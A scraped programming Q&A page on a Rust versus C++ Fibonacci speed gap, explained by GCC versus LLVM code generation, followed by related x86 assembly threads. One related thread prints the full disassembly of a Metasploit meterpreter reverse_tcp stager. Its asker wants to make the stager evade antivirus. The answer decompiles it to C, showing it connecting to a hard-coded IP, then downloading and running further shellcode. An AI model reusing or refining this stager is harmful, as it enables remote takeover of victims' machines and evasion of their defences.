Performance difference Rust and C++ - performance

I am currently learning Rust, and as a first exercise I wanted to implement a function that computes the nth fibonacci number:
fn main() {
for i in 0..48 {
println!("{}: {}", i, fibonacci(i));
}
}
fn fibonacci(n: u32) -> u32 {
match n {
0 => 0,
1 => 1,
_ => fibonacci(n - 1) + fibonacci(n - 2),
}
}
I run it as:
$ time cargo run --release
real 0m15.380s
user 0m15.362s
sys 0m0.014s
As an exercise, I also implemented the same algorithm in C++. I was expecting a similar performance, but the C++ code runs in 80% of the time:
#include<iostream>
unsigned int fibonacci(unsigned int n);
int main (int argc, char* argv[]) {
for(unsigned int i = 0; i < 48; ++i) {
std::cout << i << ": " << fibonacci(i) << '\n';
}
return 0;
}
unsigned int fibonacci(unsigned int n) {
if(n == 0) {
return 0;
} else if (n == 1) {
return 1;
} else {
return fibonacci(n - 1) + fibonacci(n - 2);
}
}
Compiled as:
$ g++ test.cpp -o test.exe -O2
And running:
$ time ./test.exe
real 0m12.127s
user 0m12.124s
sys 0m0.000s
Why do I see such a difference in performance? I am not interested in calculating the fibonacci faster in Rust (with a different algorithm); I am only interested on where the difference comes from. This is just an exercise in my progress as I learn Rust.

TL;DR: It's not Rust vs C++, it's LLVM (Clang) vs GCC.
Different optimizers optimize the code differently, and in this case GCC produces larger but faster code.
This can be verified using godbolt.
Here is Rust, compiled with both GCC (via rustgcc-master):
example::fibonacci:
push r15
push r14
push r13
push r12
push rbp
xor ebp, ebp
push rbx
mov ebx, edi
sub rsp, 24
.L2:
test ebx, ebx
je .L1
cmp ebx, 1
je .L4
lea r12d, -1[rbx]
xor r13d, r13d
.L19:
cmp r12d, 1
je .L6
lea r14d, -1[r12]
xor r15d, r15d
.L16:
cmp r14d, 1
je .L8
lea edx, -1[r14]
xor ecx, ecx
.L13:
cmp edx, 1
je .L10
lea edi, -1[rdx]
mov DWORD PTR 12[rsp], ecx
mov DWORD PTR 8[rsp], edx
call example::fibonacci.localalias
mov ecx, DWORD PTR 12[rsp]
mov edx, DWORD PTR 8[rsp]
add ecx, eax
sub edx, 2
jne .L13
.L14:
add r15d, ecx
sub r14d, 2
je .L17
jmp .L16
.L4:
add ebp, 1
.L1:
add rsp, 24
mov eax, ebp
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret
.L6:
add r13d, 1
.L20:
sub ebx, 2
add ebp, r13d
jmp .L2
.L8:
add r15d, 1
.L17:
add r13d, r15d
sub r12d, 2
je .L20
jmp .L19
.L10:
add ecx, 1
jmp .L14
And with LLVM (via rustc):
example::fibonacci:
push rbp
push r14
push rbx
mov ebx, edi
xor ebp, ebp
mov r14, qword ptr [rip + example::fibonacci#GOTPCREL]
cmp ebx, 2
jb .LBB0_3
.LBB0_2:
lea edi, [rbx - 1]
call r14
add ebp, eax
add ebx, -2
cmp ebx, 2
jae .LBB0_2
.LBB0_3:
add ebx, ebp
mov eax, ebx
pop rbx
pop r14
pop rbp
ret
We can see that LLVM produces a naive version -- calling the function in each iteration of the loop -- while GCC partially unrolls the recursion by inlining some calls. This results in a smaller number of calls in the case of GCC, and at about 5ns of overhead per function call, it's significant enough.
We can do the same exercise with the C++ version using LLVM via Clang and GCC and note that the result is pretty much similar.
So, as announced, it's a LLVM vs GCC difference, not a language one.
Incidentally, the fact that optimizers may produce such widely different results is a reason why I am quite excited at the progress of the rustc_codegen_gcc initiative (dubbed rustgcc-master on godbolt) which aims at pluging a GCC backend into the rustc frontend: once complete anyone will be able to switch to the better optimizer for their own workload.

Related

Reversing an array and printing it in x86-64

I am trying to print an array, reverse it, and then print it again. I manage to print it once. I can also make 2 consecutive calls to _printy and it works. But the code breaks with the _reverse function. It does not segfault, it exits with code 24 (I looked online but this seems to mean that the maximum number of file descriptors has been exceeded, and I cannot get what this means in this context). I stepped with a debugger and the loop logic seems to make sense.
I am not passing the array in RDI, because _printy restores the content of that register when it exits. I also tried to load it directly into RDI before calling _reverse but that does not solve the problem.
I cannot figure out what the problem is. Any idea?
BITS 64
DEFAULT REL
; -------------------------------------
; -------------------------------------
; PRINT LIST
; -------------------------------------
; -------------------------------------
%define SYS_WRITE 0x02000004
%define SYS_EXIT 0x02000001
%define SYS_OPEN 0x02000005
%define SYS_CLOSE 0x02000006
%define SYS_READ 0x02000003
%define EXIT_SUCCESS 0
%define STDOUT 1
%define LF 10
%define INT_OFFSET 48
section .text
extern _printf
extern _puts
extern _exit
global _main
_main:
push rbp
lea rdi, [rel array]
call _printy
call _reverse
call _printy
pop rbp
call _exit
_reverse:
push rbp
lea rsi, [rdi + 4 * (length - 1) ]
.LOOP2:
cmp rdi, rsi
jge .DONE2
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
add rdi,4
sub rsi,4
jmp .LOOP2
.DONE2:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
_printy:
push rbp
xor rcx, rcx
mov r8, rdi
.loop:
cmp rcx, length
jge .done
push rcx
push r8
lea rdi, [rel msg]
mov rsi, [r8 + rcx * 4]
xor rax, rax
call _printf
pop r8
pop rcx
add rcx, 1
jmp .loop
.done:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
section .data
array: dd 78, 2, 3, 4, 5, 6
length: equ ($ - array) / 4
msg: db "%d => ", 0
Edit with some info from the debugger
Stepping into the _printy function gives the following msg, once reaching the call to _printf.
* thread #1, queue = 'com.apple.main-thread', stop reason = step over failed (Could not create return address breakpoint.)
frame #0: 0x0000000100003f8e a.out`printf
a.out`printf:
-> 0x100003f8e <+0>: jmp qword ptr [rip + 0x4074] ; (void *)0x00007ff80258ef0b: printf
0x100003f94: lea r11, [rip + 0x4075] ; _dyld_private
0x100003f9b: push r11
0x100003f9d: jmp qword ptr [rip + 0x5d] ; (void *)0x00007ff843eeb520: dyld_stub_binder
I am not an expert, but a quick research online led to the following
During the 'thread step-out' command, check that the memory we are about to place a breakpoint in is executable. Previously, if the current function had a nonstandard stack layout/ABI, and had a valid data pointer in the location where the return address is usually located, data corruption would occur when the breakpoint was written. This could lead to an incorrectly reported crash or silent corruption of the program's state. Now, if the above check fails, the command safely aborts.
So after all this might not be a problem (I am also able to track the execution of the printf call). But this is really the only understandable piece of information I am able to extract from the debugger. Deep in some quite obscure (to me) function calls I reach this
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff80256db7f libsystem_c.dylib`flockfile + 10
libsystem_c.dylib`flockfile:
-> 0x7ff80256db7f <+10>: call 0x7ff8025dd480 ; symbol stub for: __error
0x7ff80256db84 <+15>: mov r14d, dword ptr [rax]
0x7ff80256db87 <+18>: mov rdi, qword ptr [rbx + 0x68]
0x7ff80256db8b <+22>: add rdi, 0x8
Target 0: (a.out) stopped.
(lldb)
Process 61913 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff8025dd480 libsystem_c.dylib`__error
This is one of the function calls happening in _printf.
Ask further questions if there is something more I can do.
Your array consists of int32 numbers aka dd in nasm terminology, but your swap operates on 64 bit numbers:
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
Assuming you were not after some crazy optimizations where you swap a pair of elements simultaneously you want this to remain in 32 bits:
mov r8d, [rdi]
mov r9d, [rsi]
mov [rdi], r9d
mov [rsi], r8d

find all paths from top left corner to right bottom corner assembly

I am new to assembly programming, currently taking online course.
Original problem was to count number of paths from top left corner to bottom right corner. But I found a good solution to that here:
https://www.geeksforgeeks.org/count-possible-paths-top-left-bottom-right-nxm-matrix/
Based on the combinatorics solution I should be able to find all paths in a binary manner.
First question, do you know a faster way to count paths?
Searched for the solution to print all paths in:
https://www.geeksforgeeks.org/print-all-possible-paths-from-top-left-to-bottom-right-of-a-mxn-matrix/
But did not notice any using the binary approach with seemed adequate for assembly.
Searching a bit more online I found:
https://www.baeldung.com/cs/generate-k-combinations
Revolving door algorithm was well detailed, and I calculate it to be O (number of combinations) * O (width or height of matrix (for printing) -1) * O (branching loops) on time complexity and O (width or height + 1) on space. Second question is this a correct assumption? If not, what is the correct complexity? Is it faster than the other solutions posted for finding all paths to this problem? Those are stated to be O(2^(width*height))
Third question: Who wrote this algorithm? Where can I find more like it?
And lastly, I will post my newbie 32-bit assembly pasta code for fasm, should work on matrixes larger than 3 x 3 smaller than 32 x 32(not recommended to go above 16 x 16 that is already a lot of combinations and only omitting the print instructions), any improvements are more than welcome. Thank you.
format PE console
entry start
include 'win32a.inc'
; ===============================================
struct MAT
h db ? ; X coordinate.
w db ? ; Y coordinate.
ends
; ===============================================
section '.bss' readable writeable
; Declare the uninitialized table in memory:
path_matrix MAT ?
count dd ?
indices db path_matrix.w - 1 dup ?
end_indices:
; ===============================================
section '.text' code readable executable
start:
call read_hex
mov [path_matrix.h], al ; down will be 0
call read_hex
mov [path_matrix.w], al ; right will be 1
dec eax
mov ecx, eax
initialize:
mov ebx, ecx
dec ebx
mov byte[indices+ecx], bl
loop initialize
movzx ebx, [path_matrix.h]
dec ebx
add ebx, eax
mov byte[indices+eax+1], bl
mov eax, ebx
print_combination:
inc [count]
movzx ebx, [end_indices - indices]
dec ebx
xor eax, eax
print_loop:
xor esi, esi
inc esi
mov cl, byte[indices + ebx ]
shl esi, cl
xor eax, esi
dec ebx
cmp ebx, 0
jnz print_loop
call print_eax_binary
branch:
lea edi, [indices +1]
movzx eax, [path_matrix.w] ; check if withd is eaven, if true matrix is odd (w -1)
shr eax, 1
jnc odd
eaven:
movzx eax, byte[edi]
cmp eax, 0
jle eaven_indice
dec eax
mov byte[edi], al
jmp print_combination
eaven_indice:
inc edi
try_to_increase:
movzx ebx, byte[edi]
inc ebx
cmp bl, [edi+1]
jl increase
lea ecx, [edi-indices+1]
cmp cl, [path_matrix.w]
jl increase_indice
jmp fin
increase:
mov byte[edi], bl
dec ebx
mov byte[edi-1], bl
jmp print_combination
odd:
movzx eax, byte[edi]
inc eax
cmp al, [edi+1]
jge increase_indice
mov byte[edi], al
jmp print_combination
increase_indice:
inc edi
try_decrease:
lea eax, [edi - indices]
cmp byte[edi], al
jl eaven_indice
decrease:
movzx ebx, byte[edi-1]
mov byte[edi], bl
sub eax, 2
mov byte[edi-1], al
jmp print_combination
fin:
mov eax, [count]
call print_eax
; Exit the process:
push 0
call [ExitProcess]
include 'training.inc'
The solution is not binary because paths from the top or left can overlap - creating duplicates. Working backward the solution is additive - sum of paths from left and paths from top.
Which leads to a simple solution:
_m = 16
_n = 16
ddp rq _m
; initialize first position
mov [ddp + (_n-1)*8], 1
mov ecx, _m
outer:
push rcx
mov ecx, _n
xor eax, eax
inner:
add rax, [ddp + (rcx-1)*8]
mov [ddp + (rcx-1)*8], rax
loop inner
pop rcx
loop outer
There is a closed form solution, but it's a little tricky to reduce the expression in such a way as to cover a large number of inputs:
; number of paths from one corner to opposite diagonal corner of M x N matrix
; RCX : N, RDX : M
numberOfPaths:
mov eax,1
mov r9,1
lea r8,[rcx+rdx-1]
jmp .try
.more:
mul rcx
inc ecx
div r9
inc r9
.try:
cmp rcx,r8
jc .more
retn
It can be reduced further with more code.

X64 ASSEMBLY - Cannot run compiled and linked raw shellcode in Windows

After using metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (with the hope of evading my AVs).
To test my work flow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong ?
your shell code if convert it to c/c++ is next:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0);// !! error in shellcode or special damaged ?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// must be MEM_RELEASE for free memory, but used MEM_DECOMMIT in code.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
it i be say worked under debugger. if something not worked for you - debug it. especially put bp on jmp rax - the begin of shell code is function which search for exported api (by hash) and call it (jmp rax)

How to echo memory location use NASM [duplicate]

I am looking for a way to print an integer in assembler (the compiler I am using is NASM on Linux), however, after doing some research, I have not been able to find a truly viable solution. I was able to find a description for a basic algorithm to serve this purpose, and based on that I developed this code:
global _start
section .bss
digit: resb 16
count: resb 16
i: resb 16
section .data
section .text
_start:
mov dword[i], 108eh ; i = 4238
mov dword[count], 1
L01:
mov eax, dword[i]
cdq
mov ecx, 0Ah
div ecx
mov dword[digit], edx
add dword[digit], 30h ; add 48 to digit to make it an ASCII char
call write_digit
inc dword[count]
mov eax, dword[i]
cdq
mov ecx, 0Ah
div ecx
mov dword[i], eax
cmp dword[i], 0Ah
jg L01
add dword[i], 48 ; add 48 to i to make it an ASCII char
mov eax, 4 ; system call #4 = sys_write
mov ebx, 1 ; file descriptor 1 = stdout
mov ecx, i ; store *address* of i into ecx
mov edx, 16 ; byte size of 16
int 80h
jmp exit
exit:
mov eax, 01h ; exit()
xor ebx, ebx ; errno
int 80h
write_digit:
mov eax, 4 ; system call #4 = sys_write
mov ebx, 1 ; file descriptor 1 = stdout
mov ecx, digit ; store *address* of digit into ecx
mov edx, 16 ; byte size of 16
int 80h
ret
C# version of what I want to achieve (for clarity):
static string int2string(int i)
{
Stack<char> stack = new Stack<char>();
string s = "";
do
{
stack.Push((char)((i % 10) + 48));
i = i / 10;
} while (i > 10);
stack.Push((char)(i + 48));
foreach (char c in stack)
{
s += c;
}
return s;
}
The issue is that it outputs the characters in reverse, so for 4238, the output is 8324. At first, I thought that I could use the x86 stack to solve this problem, push the digits in, and pop them out and print them at the end, however when I tried implementing that feature, it flopped and I could no longer get an output.
As a result, I am a little bit perplexed about how I can implement a stack in to this algorithm in order to accomplish my goal, aka printing an integer. I would also be interested in a simpler/better solution if one is available (as it's one of my first assembler programs).
One approach is to use recursion. In this case you divide the number by 10 (getting a quotient and a remainder) and then call yourself with the quotient as the number to display; and then display the digit corresponding to the remainder.
An example of this would be:
;Input
; eax = number to display
section .data
const10: dd 10
section .text
printNumber:
push eax
push edx
xor edx,edx ;edx:eax = number
div dword [const10] ;eax = quotient, edx = remainder
test eax,eax ;Is quotient zero?
je .l1 ; yes, don't display it
call printNumber ;Display the quotient
.l1:
lea eax,[edx+'0']
call printCharacter ;Display the remainder
pop edx
pop eax
ret
Another approach is to avoid recursion by changing the divisor. An example of this would be:
;Input
; eax = number to display
section .data
divisorTable:
dd 1000000000
dd 100000000
dd 10000000
dd 1000000
dd 100000
dd 10000
dd 1000
dd 100
dd 10
dd 1
dd 0
section .text
printNumber:
push eax
push ebx
push edx
mov ebx,divisorTable
.nextDigit:
xor edx,edx ;edx:eax = number
div dword [ebx] ;eax = quotient, edx = remainder
add eax,'0'
call printCharacter ;Display the quotient
mov eax,edx ;eax = remainder
add ebx,4 ;ebx = address of next divisor
cmp dword [ebx],0 ;Have all divisors been done?
jne .nextDigit
pop edx
pop ebx
pop eax
ret
This example doesn't suppress leading zeros, but that would be easy to add.
I think that maybe implementing a stack is not the best way to do this (and I really think you could figure out how to do that, saying as how pop is just a mov and a decrement of sp, so you can really set up a stack anywhere you like by just allocating memory for it and setting one of your registers as your new 'stack pointer').
I think this code could be made clearer and more modular if you actually allocated memory for a c-style null delimited string, then create a function to convert the int to string, by the same algorithm you use, then pass the result to another function capable of printing those strings. It will avoid some of the spaghetti code syndrome you are suffering from, and fix your problem to boot. If you want me to demonstrate, just ask, but if you wrote the thing above, I think you can figure out how with the more split up process.
; Input
; EAX = pointer to the int to convert
; EDI = address of the result
; Output:
; None
int_to_string:
xor ebx, ebx ; clear the ebx, I will use as counter for stack pushes
.push_chars:
xor edx, edx ; clear edx
mov ecx, 10 ; ecx is divisor, devide by 10
div ecx ; devide edx by ecx, result in eax remainder in edx
add edx, 0x30 ; add 0x30 to edx convert int => ascii
push edx ; push result to stack
inc ebx ; increment my stack push counter
test eax, eax ; is eax 0?
jnz .push_chars ; if eax not 0 repeat
.pop_chars:
pop eax ; pop result from stack into eax
stosb ; store contents of eax in at the address of num which is in EDI
dec ebx ; decrement my stack push counter
cmp ebx, 0 ; check if stack push counter is 0
jg .pop_chars ; not 0 repeat
mov eax, 0x0a
stosb ; add line feed
ret ; return to main
; eax = number to stringify/output
; edi = location of buffer
intToString:
push edx
push ecx
push edi
push ebp
mov ebp, esp
mov ecx, 10
.pushDigits:
xor edx, edx ; zero-extend eax
div ecx ; divide by 10; now edx = next digit
add edx, 30h ; decimal value + 30h => ascii digit
push edx ; push the whole dword, cause that's how x86 rolls
test eax, eax ; leading zeros suck
jnz .pushDigits
.popDigits:
pop eax
stosb ; don't write the whole dword, just the low byte
cmp esp, ebp ; if esp==ebp, we've popped all the digits
jne .popDigits
xor eax, eax ; add trailing nul
stosb
mov eax, edi
pop ebp
pop edi
pop ecx
pop edx
sub eax, edi ; return number of bytes written
ret

Recursion in Assembly

I need help with Assembly code which I just started learning.
.intel_syntax noprefix;
.text;
.globl main;
main:
mov eax, 3;
mov ebx, 0;
push eax;
push ebx;
call f;
add esp, 8;
push eax;
mov eax, offset message;
push eax;
call printf
add esp,8;
mov eax,0;
ret;
f:
mov eax, [esp+8];
mov ebx, [esp+4];
cmp eax,3;
jge ety2;
cmp eax,2;
je ety1;
cmp eax,0;
je ety1;
cmp eax,1;
je ety3;
ety3:
mov eax,0;
ret;
ety1:
mov eax,1;
ret;
ety2:
xor ebx,ebx;
dec eax;
push eax;
push ebx;
call f;
add esp,8;
add ebx,[esp+4];
add ebx,eax;
mov eax,[esp+8];
dec eax;
dec eax;
push eax;
push ebx;
call f;
add esp,8;
add ebx,[esp+4];
add ebx,eax;
add ebx,eax;
mov eax,[esp+8];
dec eax;
dec eax;
dec eax;
push eax;
push ebx;
call f;
add esp,8;
add ebx,[esp+4];
sub ebx,eax;
mov eax,[esp+8];
mov eax,ebx;
ret;
.data;
message:
.asciz "Result=%i\n";
.att_syntax prefix;
In main function 'eax' register is used as a 'n' parameter for function that:
for n=0 or n=2 returns 1;
for n=1 returns 0;
for n>=3 returns f(n-1)+(2*f(n-2))-f(n-3);
So for n=3 function returns 0, n=4 returns 2, n=5 returns 1, n=6 returns 5 e.t.c.
The recursion is pretty problematic, for values < 5 fuction works fine, but for 6, 7 e.t.c. function returns tremendously high or low (negative) values.
I've been working on it for +10 hours, and I can't manage to make it work
property. What am I doing wrong?
It is required to use "PUSH" and "[esp+4]", "add esp,4;" and other simple instructions that are already in the code.
Program is compiled under -m32 command parameter(gcc -Wall funcas.s -m32 -o test).
I wrote down the same code in C to show what i'm trying to achieve
#include <stdio.h>
#include <stdlib.h>
int funkcja(int n)
{
if(n>=3)
{
return (funkcja(n-1)+(2*funkcja(n-2))-funkcja(n-3));
}
else
{
if(n==2)return 1;
if(n==1)return 0;
if(n==0)return 1;
}
return -1;
}
int main()
{
int a=6;
printf("%d\n", funkcja(a));
return 0;
}
The problem is that the code keeps accumulating all of the results. Change f to only use one parameter. Example Microsoft type assembler code. In both f() and main(), n is stored on the stack.
.model flat,c
; ...
.data
fmt db '%d',00ah,000h
.code
extern printf:proc
public main
f proc ;int f(int n)
mov eax, [esp+4]
cmp eax,3
jge f2
cmp eax,2
je f1
cmp eax,1
je f0
cmp eax,0
je f1
mov eax,-1
ret
f0: mov eax,0
ret
f1: mov eax,1
ret
f2: push ebx ;save ebx
dec eax ;eax = n-1
push eax ;[esp] = n-1
call f ;eax = f(n-1)
mov ebx,eax ;ebx = f(n-1)
dec dword ptr [esp] ;[esp] = n-2
call f ;eax = f(n-2)
add eax,eax ;eax = 2*f(n-2)
add ebx,eax ;ebx = f(n-1) + 2*f(n-2)
dec dword ptr [esp] ;[esp] = n-3
call f ;eax = f(n-3)
add esp,4 ;restore esp
sub ebx,eax ;ebx = f(n-1) + 2*f(n-2) - f(n-3)
mov eax,ebx ;eax = f(n-1) + 2*f(n-2) - f(n-3)
pop ebx ;restore ebx
ret
f endp
main proc near
push dword ptr 0 ;[esp] = n
main0: call f
push eax
push offset fmt
call printf
add esp,8
inc dword ptr [esp]
cmp dword ptr [esp],20
jl main0
add esp,4
xor eax,eax
ret
main endp
I don't understand your action with EBX and the second argument on the stack.
Let's start from scratch. A recursive function is a function as well. When you call it you have to preserve registers which can be altered by the function and you need unaltered after the function return. The function calls itself three times with different n and operates with the different results. While you've got n on the stack for arbitrary recovery, you have to preserve the results. It becomes more clear when you split return (funkcja(n-1)+(2*funkcja(n-2))-funkcja(n-3)); into
int result = 0;
result += funkcja(n-1);
result += ( 2 * funkcja(n-2) );
result -= funkcja(n-3);
return result;
result is a so called local variable. It's only needed for this run of the function and will lost with the function return. A local variable is usually stored on the stack. You don't need to build a stackframe with prolog and epilog, a simple push/pop combination will do it as well.
# f(n) = f(n-1) + (2*f(n-2)) - f(n-3)
# 0 1
# 1 0
# 2 1
# 3 0 1 + 0 - 1
# 4 2 0 + 2 - 0
# 5 1 2 + 0 - 1
# 6 5 1 + 4 - 0
# 7 5 5 + 2 - 2
# 8 14 5 + 10 - 1
# 9 19 14 + 10 - 5
.intel_syntax noprefix
.text
.globl main
main:
mov eax, 9
push eax
call funkcja
add esp, 4
push eax
mov eax, offset message
push eax
call printf
add esp,8
mov eax,0
ret
funkcja:
mov eax, [esp+4]
cmp eax,3
jge 3f
2:
cmp eax,2
jne 0f
mov eax, 1
ret
0:
cmp eax,0
jne 1f
mov eax, 1
ret
1:
xor eax, eax
ret
3:
push 0 # Result = 0
# 1. Call
mov eax, [esp+8] # +8: retrieve n behind push and return address
sub eax, 1
push eax
call funkcja
add esp, 4
add [esp], eax # Result += EAX
# 2. Call
mov eax, [esp+8] # +8: retrieve n behind push and return address
sub eax, 2
push eax
call funkcja
add esp, 4
add eax, eax
add [esp], eax # Result += EAX
# 3. Call
mov eax, [esp+8] # +8: retrieve n behind push and return address
sub eax, 3
push eax
call funkcja
add esp, 4
sub [esp], eax # Result -= EAX
pop eax # Return EAX = Result
ret
.data;
message: .asciz "Result=%i\n"
.att_syntax prefix

Resources